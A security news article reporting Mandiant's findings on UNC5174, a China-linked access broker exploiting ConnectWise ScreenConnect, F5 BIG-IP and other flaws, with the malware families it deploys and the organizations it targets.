China-Linked Threat Cluster Exploits Connectwise, F5 Software Vulnerabilities

March 22, 2024

A threat group connected to China, tracked as UNC5174 (Uteus or Uetus), has been exploiting security flaws in Connectwise ScreenConnect and F5 BIG-IP software to launch a malicious campaign. Google-owned Mandiant has identified the group as a former Chinese hacktivist collective that now appears to act as a contractor for China's Ministry of State Security (MSS).

The group has reportedly conducted extensive attacks on research and education institutions in Southeast Asia and the U.S., businesses in Hong Kong, charities, non-governmental organizations (NGOs), and government organizations in the U.S. and U.K. These attacks took place between October and November 2023, and in February 2024, exploiting the ScreenConnect bug.

The threat actor gains initial access to target environments by exploiting known security flaws in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), Linux Kernel (CVE-2022-0185), and Zyxel (CVE-2022-3052). Following a successful breach, the group performs extensive reconnaissance, scanning internet-facing systems for vulnerabilities, and creating administrative user accounts to execute malicious actions with elevated privileges.

The group deploys a C-based ELF downloader named SNOWLIGHT, designed to download the next-stage payload, an obfuscated Golang backdoor named GOREVERSE, from a remote URL. This is linked to SUPERSHELL, an open-source command-and-control (C2) framework that allows attackers to establish a reverse SSH tunnel and launch interactive shell sessions to execute arbitrary code.

The threat actor also uses a Golang-based tunneling tool called GOHEAVY, likely used to facilitate lateral movement within compromised networks. Other programs such as afrog, DirBuster, Metasploit, Sliver, and sqlmap are also used. In a unique instance, the threat actors applied mitigations for CVE-2023-46747, presumably to prevent other adversaries from exploiting the same vulnerability to gain access.

Mandiant's assessment suggests that UNC5174 was formerly a member of Chinese hacktivist collectives 'Dawn Calvary' and has collaborated with 'Genesis Day' / 'Xiaoqiying' and 'Teng Snake'. This individual seems to have left these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.

Evidence suggests that the threat actor may be an initial access broker, even claiming to be affiliated with the MSS in dark web forums. This is supported by the fact that some of the U.S. defense and U.K. government entities were simultaneously targeted by another access broker referred to as UNC302.

The findings highlight the ongoing efforts of Chinese nation-state groups to breach edge appliances by quickly adopting recently disclosed vulnerabilities for large-scale cyber espionage operations. 'UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation,' Mandiant researchers said. 'There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.'

The disclosure comes as the MSS warned that an unnamed foreign hacking group had infiltrated 'hundreds' of Chinese business and government organizations by leveraging phishing emails and known security bugs to breach networks. The threat actor's name or origin was not disclosed.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.